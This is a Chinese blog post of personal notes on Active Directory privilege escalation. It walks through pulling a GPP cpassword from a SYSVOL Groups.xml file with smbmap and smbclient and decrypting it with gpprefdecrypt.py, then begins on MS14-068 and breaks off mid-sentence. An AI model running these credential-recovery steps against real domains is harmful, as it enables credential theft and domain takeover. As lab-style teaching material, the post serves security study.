0x01、前言菜鸡一枚,标题起的可能有点大,只是个人笔记整理的一个合集(所以基本每个例子都会有实例) 。所以虽然说是合集,可能都没有囊括到各位大佬会的一半 。还请各位大佬轻喷
文章插图
0x02、目录GPP和SYSVOL中的密码
MS14-068
DNSAdmins
不安全的GPO权限
不安全的ACLs权限
Exchange
LLMNR/NBT-NS 投毒
Kerberoasting
AD recyle Bin
0x03、 GPP和SYSVOL中的密码什么是GPP: GPP被用来将通用的本地管理员密码应用于所有工作站、应用全新的管理员帐户、为其他用户安排任务、应用打印机等用途 一般域内机子较多的情况,管理员为了方便管理,在主机上设置本地管理员密码GPP 。配置此功能后,会在域控制器上创建一个XML文件,其中包含将策略应用于连接到域的工作站或便携式计算机时配置帐户所需的信息 。该xml文件包含管理帐户的密码,一般情况下任意域用户都可以读取(通常是DC开启SYSVOL目录共享) 这里不得不提的一点是Microsoft已使用AES加密了xml文件中的密码以提高安全性,但又发布了用于加密和解密该值的密钥(所以这是什么操作???)
漏洞利用: 接到域控制器的默认SYSVOL共享,并在其中搜索groups.xml的实例 。如果存在这些文件,位于格式类似于以下的文件夹中:
\active.localPolicies{31B2F340-016D-11D2-945F-00C04FB984F9}macHINEPreferencesGroupsGroups.xml
0x03.1、定位域控制器set l
nltest /DSGETDC:
echo %logonserver%
net time /domain
......
0x03.2、查询DC共享目录使用enumlinux或者smbmap检查共享目录
smbmap -H 10.10.10.100 ###列出目标用户共享列表
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS
0x03.3、连接与共享smbclient //active.local/Replication -N
smb: active.localPolicies{31B2F340-016D-11D2-945F-00C04FB984F9}MACHINEPreferencesGroups> more Groups.xml
<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.localSVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.localSVC_TGS"></Properties></User>
0x03.4、使用gpprefdecrypt.py解密:Python gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
0x04、MS14-068危害:任意域内用户都可以提权到域控
一般为本地账户才能成功,但是使用klist purge清除缓存证书可绕过限制
0x04.1、漏洞成因在 KDC 对 PAC 进行验证时,根据协议规定必须是带有 server Hash、KDC Hash 的签名算法才可以(原本的设计是 HMAC 系列的 checksum 算法),但微软在实现上,却允许任意签名算法 。只要客户端指定任意签名算法,KDC 就会使用指定的算法进行签名验证,致使导致恶意用户在发送给KDC的TG
推荐阅读
- 黑客大神熬夜整理的xss各种骚操作
- 剪辑大神都在用的加字幕神器,你知道嘛
- 黑客大神告诉你:Getshell总结
- 黑客大神教你:Weblogic相关漏洞复现
- 2020新个税如何计算,用Python脚本告诉你
- 魔兽世界|毕业多年的学姐告诉你,专科生求职太难,大多只能从事这3种工作
- 春季为何易犯胃病?让专家告诉你
- 探秘十大神奇自然现象 自然界十大奇特现象
- 你真的会用荣耀平板吗?7大小技巧,告诉你怎么才能畅玩
- 你所不知道的C语言高级用法